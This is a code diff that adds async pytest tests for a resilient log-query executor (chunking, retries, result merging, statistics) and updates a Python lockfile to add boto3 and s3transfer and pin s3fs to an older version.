+ call_count = 0 + + async def count_calls(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=count_calls) + + # 3 hour range but chunking disabled + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made only one call (not chunked) + assert call_count == 1 + + @pytest.mark.asyncio + async def test_execute_chunked_merge_results(self) -> None: + """Test that chunked results are properly merged.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + chunk_num = 0 + + async def return_chunk_results(**kwargs: Any) -> dict[str, Any]: + nonlocal chunk_num + chunk_num += 1 + return { + "status": "success", + "data": {"result": [{"stream": {}, "values": [[chunk_num, f"log{chunk_num}"]]}]}, + } + + mock_query_fn = AsyncMock(side_effect=return_chunk_results) + + # Range > 2 hours triggers chunking (chunking threshold is > 2h) + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", # 3 hours = 6 chunks + ) + + # Results should be merged (6 chunks for 3 hours / 30 min) + assert "data" in result + assert len(result["data"]["result"]) >= 2 + + def test_count_results_list(self) -> None: + """Test counting results from a list.""" + executor = QueryResilientExecutor() + + result = [1, 2, 3, 4, 5] + count = executor._count_results(result) + + assert count == 5 + + def test_count_results_dict_with_streams(self) -> None: + """Test counting results from Loki-style response.""" + executor = QueryResilientExecutor() + + result = { + "data": { + "result": [ + {"stream": {}, "values": [[1, "a"], [2, "b"]]}, + {"stream": {}, "values": [[3, "c"]]}, + ] + } + } + count = executor._count_results(result) + + assert count == 3 # 2 + 1 values + + def test_count_results_empty(self) -> None: + """Test counting results from empty response.""" + executor = QueryResilientExecutor() + + assert executor._count_results({}) == 0 + assert executor._count_results({"data": {}}) == 0 + assert executor._count_results({"data": {"result": []}}) == 0 + + def test_get_stats_summary(self) -> None: + """Test getting stats summary.""" + executor = QueryResilientExecutor() + executor.stats.total_attempts = 10 + executor.stats.successful_attempts = 8 + executor.stats.timeout_count = 2 + executor.stats.retry_count = 3 + executor.stats.time_range_reductions = 1 + + summary = executor.get_stats_summary() + + assert summary["total_attempts"] == 10 + assert summary["successful_attempts"] == 8 + assert summary["success_rate"] == "80.0%" + assert summary["timeout_count"] == 2 + assert summary["retry_count"] == 3 + assert summary["time_range_reductions"] == 1 + + def test_merge_chunk_results_empty(self) -> None: + """Test merging empty chunk results.""" + executor = QueryResilientExecutor() + + result = executor._merge_chunk_results([]) + + assert result["status"] == "success" + assert result["data"]["result"] == [] + + def test_merge_chunk_results_multiple(self) -> None: + """Test merging multiple chunk results.""" + executor = QueryResilientExecutor() + + chunks = [ + {"data": {"result": [{"stream": "a", "values": [1, 2]}]}}, + {"data": {"result": [{"stream": "b", "values": [3, 4]}]}}, + {"data": {"result": [{"stream": "c", "values": [5]}]}}, + ] + + result = executor._merge_chunk_results(chunks) + + assert result["status"] == "success" + assert len(result["data"]["result"]) == 3 + + +class TestGlobalExecutor: + """Tests for global executor functions.""" + + def test_get_resilient_executor_creates_default(self) -> None: + """Test that get_resilient_executor creates a default instance.""" + reset_resilient_executor() + + executor = get_resilient_executor() + + assert executor is not None + assert isinstance(executor, QueryResilientExecutor) + + reset_resilient_executor() + + def test_get_resilient_executor_returns_same_instance(self) -> None: + """Test that get_resilient_executor returns the same instance.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is executor2 + + reset_resilient_executor() + + def test_reset_resilient_executor(self) -> None: + """Test resetting the global executor.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + reset_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is not executor2 + + reset_resilient_executor() + + +class TestTimeRangeFactors: + """Tests for time range reduction factors.""" + + def test_time_range_factors_order(self) -> None: + """Test that time range factors are in descending order.""" + factors = QueryResilientExecutor.TIME_RANGE_FACTORS + + assert factors == sorted(factors, reverse=True) + assert factors[0] == 1.0 # Start with full range + assert factors[-1] < 0.5 # End with small range + + def test_backoff_delays_order(self) -> None: + """Test that backoff delays are in ascending order.""" + delays = QueryResilientExecutor.BACKOFF_DELAYS + + assert delays == sorted(delays) + assert delays[0] >= 1 # At least 1 second + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_execute_with_z_suffix_timestamps(self) -> None: + """Test handling of Z suffix in timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_offset_timestamps(self) -> None: + """Test handling of offset timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00+00:00", + end_time="2024-01-15T11:00:00+00:00", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_grpc_error(self) -> None: + """Test handling of gRPC errors.""" + executor = QueryResilientExecutor(max_retries=3) + + mock_query_fn = AsyncMock(side_effect=Exception("grpc: connection failed")) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should give up on gRPC errors and move to next time range factor + assert result["status"] == "error" + + @pytest.mark.asyncio + async def test_execute_with_non_timeout_error_response(self) -> None: + """Test handling of non-timeout error responses.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + "error": "invalid query syntax", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Non-timeout errors should be returned (not retried indefinitely) + # The result might still have metadata + assert executor.stats.timeout_count == 0 diff --git a/uv.lock b/uv.lock index 82f787e0..92e371b4 100644 --- a/uv.lock +++ b/uv.lock @@ -7,24 +7,6 @@ resolution-markers = [ "python_full_version < '3.11'", ] -[[package]] -name = "aiobotocore" -version = "2.26.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "aiohttp" }, - { name = "aioitertools" }, - { name = "botocore" }, - { name = "jmespath" }, - { name = "multidict" }, - { name = "python-dateutil" }, - { name = "wrapt" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/4d/f8/99fa90d9c25b78292899fd4946fce97b6353838b5ecc139ad8ba1436e70c/aiobotocore-2.26.0.tar.gz", hash = "sha256:50567feaf8dfe2b653570b4491f5bc8c6e7fb9622479d66442462c021db4fadc", size = 122026, upload-time = "2025-11-28T07:54:59.956Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/b7/58/3bf0b7d474607dc7fd67dd1365c4e0f392c8177eaf4054e5ddee3ebd53b5/aiobotocore-2.26.0-py3-none-any.whl", hash = "sha256:a793db51c07930513b74ea7a95bd79aaa42f545bdb0f011779646eafa216abec", size = 87333, upload-time = "2025-11-28T07:54:58.457Z" }, -] - [[package]] name = "aiofiles" version = "24.1.0" @@ -129,15 +111,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/5d/28/a8a9fc6957b2cee8902414e41816b5ab5536ecf43c3b1843c10e82c559b2/aiohttp-3.13.2-cp313-cp313-win_amd64.whl", hash = "sha256:a88d13e7ca367394908f8a276b89d04a3652044612b9a408a0bb22a5ed976a1a", size = 452192, upload-time = "2025-10-28T20:57:34.166Z" }, ] -[[package]] -name = "aioitertools" -version = "0.13.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/fd/3c/53c4a17a05fb9ea2313ee1777ff53f5e001aefd5cc85aa2f4c2d982e1e38/aioitertools-0.13.0.tar.gz", hash = "sha256:620bd241acc0bbb9ec819f1ab215866871b4bbd1f73836a55f799200ee86950c", size = 19322, upload-time = "2025-11-06T22:17:07.609Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/10/a1/510b0a7fadc6f43a6ce50152e69dbd86415240835868bb0bd9b5b88b1e06/aioitertools-0.13.0-py3-none-any.whl", hash = "sha256:0be0292b856f08dfac90e31f4739432f4cb6d7520ab9eb73e143f4f2fa5259be", size = 24182, upload-time = "2025-11-06T22:17:06.502Z" }, -] - [[package]] name = "aiosignal" version = "1.4.0" @@ -194,6 +167,7 @@ name = "ares" version = "0.1.0" source = { editable = "." } dependencies = [ + { name = "boto3" }, { name = "cyclopts" }, { name = "dreadnode" }, { name = "httpx" }, @@ -226,6 +200,7 @@ dev = [ [package.metadata] requires-dist = [ + { name = "boto3", specifier = ">=1.42.25" }, { name = "cyclopts", specifier = ">=4.2.0" }, { name = "dreadnode", specifier = ">=1.17.0" }, { name = "httpx", specifier = ">=0.28.0,<1.0.0" }, @@ -302,18 +277,32 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/02/e3/a4fa1946722c4c7b063cc25043a12d9ce9b4323777f89643be74cef2993c/backrefs-6.1-py39-none-any.whl", hash = "sha256:a9e99b8a4867852cad177a6430e31b0f6e495d65f8c6c134b68c14c3c95bf4b0", size = 381058, upload-time = "2025-11-15T14:52:06.698Z" }, ] +[[package]] +name = "boto3" +version = "1.42.25" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, + { name = "jmespath" }, + { name = "s3transfer" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/29/30/755a6c4b27ad4effefa9e407f84c6f0a69f75a21c0090beb25022dfcfd3f/boto3-1.42.25.tar.gz", hash = "sha256:ccb5e757dd62698d25766cc54cf5c47bea43287efa59c93cf1df8c8fbc26eeda", size = 112811, upload-time = "2026-01-09T20:27:44.73Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/14/79/012734f4e510b0a6beec2a3d5f437b3e8ef52174b1d38b1d5fdc542316d7/boto3-1.42.25-py3-none-any.whl", hash = "sha256:8128bde4f9d5ffce129c76d1a2efe220e3af967a2ad30bc305ba088bbc96343d", size = 140575, upload-time = "2026-01-09T20:27:42.788Z" }, +] + [[package]] name = "botocore" -version = "1.41.5" +version = "1.42.25" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "jmespath" }, { name = "python-dateutil" }, { name = "urllib3" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/90/22/7fe08c726a2e3b11a0aef8bf177e83891c9cb2dc1809d35c9ed91a9e60e6/botocore-1.41.5.tar.gz", hash = "sha256:0367622b811597d183bfcaab4a350f0d3ede712031ce792ef183cabdee80d3bf", size = 14668152, upload-time = "2025-11-26T20:27:38.026Z" } +sdist = { url = "https://files.pythonhosted.org/packages/2c/b5/8f961c65898deb5417c9e9e908ea6c4d2fe8bb52ff04e552f679c88ed2ce/botocore-1.42.25.tar.gz", hash = "sha256:7ae79d1f77d3771e83e4dd46bce43166a1ba85d58a49cffe4c4a721418616054", size = 14879737, upload-time = "2026-01-09T20:27:34.676Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/4e/4e/21cd0b8f365449f1576f93de1ec8718ed18a7a3bc086dfbdeb79437bba7a/botocore-1.41.5-py3-none-any.whl", hash = "sha256:3fef7fcda30c82c27202d232cfdbd6782cb27f20f8e7e21b20606483e66ee73a", size = 14337008, upload-time = "2025-11-26T20:27:35.208Z" }, + { url = "https://files.pythonhosted.org/packages/1e/b0/61e3e61d437c8c73f0821ce8a8e2594edfc1f423e354c38fa56396a4e4ca/botocore-1.42.25-py3-none-any.whl", hash = "sha256:470261966aab1d09a1cd4ba56810098834443602846559ba9504f6613dfa52dc", size = 14553881, upload-time = "2026-01-09T20:27:30.487Z" }, ] [[package]] @@ -3008,16 +2997,27 @@ wheels = [ [[package]] name = "s3fs" -version = "2025.12.0" +version = "0.4.2" source = { registry = "https://pypi.org/simple" } dependencies = [ - { name = "aiobotocore" }, - { name = "aiohttp" }, + { name = "botocore" }, { name = "fsspec" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/cf/26/fff848df6a76d6fec20208e61548244639c46a741e296244c3404d6e7df0/s3fs-2025.12.0.tar.gz", hash = "sha256:8612885105ce14d609c5b807553f9f9956b45541576a17ff337d9435ed3eb01f", size = 81217, upload-time = "2025-12-03T15:34:04.754Z" } +sdist = { url = "https://files.pythonhosted.org/packages/d9/9a/504cb277632c4d325beabbd03bb43778f0decb9be22d9e0e6c62f44540c7/s3fs-0.4.2.tar.gz", hash = "sha256:2ca5de8dc18ad7ad350c0bd01aef0406aa5d0fff78a561f0f710f9d9858abdd0", size = 57527, upload-time = "2020-03-31T15:24:26.388Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/b8/e4/b8fc59248399d2482b39340ec9be4bb2493846ac23641b43115a7e5cd675/s3fs-0.4.2-py3-none-any.whl", hash = "sha256:91c1dfb45e5217bd441a7a560946fe865ced6225ff7eb0fb459fe6e601a95ed3", size = 19791, upload-time = "2020-03-31T15:24:24.952Z" }, +] + +[[package]] +name = "s3transfer" +version = "0.16.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/05/04/74127fc843314818edfa81b5540e26dd537353b123a4edc563109d8f17dd/s3transfer-0.16.0.tar.gz", hash = "sha256:8e990f13268025792229cd52fa10cb7163744bf56e719e0b9cb925ab79abf920", size = 153827, upload-time = "2025-12-01T02:30:59.114Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/44/8c/04797ebb53748b4d594d4c334b2d9a99f2d2e06e19ad505f1313ca5d56eb/s3fs-2025.12.0-py3-none-any.whl", hash = "sha256:89d51e0744256baad7ae5410304a368ca195affd93a07795bc8ba9c00c9effbb", size = 30726, upload-time = "2025-12-03T15:34:03.576Z" }, + { url = "https://files.pythonhosted.org/packages/fc/51/727abb13f44c1fcf6d145979e1535a35794db0f6e450a0cb46aa24732fe2/s3transfer-0.16.0-py3-none-any.whl", hash = "sha256:18e25d66fed509e3868dc1572b3f427ff947dd2c56f844a5bf09481ad3f3b2fe", size = 86830, upload-time = "2025-12-01T02:30:57.729Z" }, ] [[package]]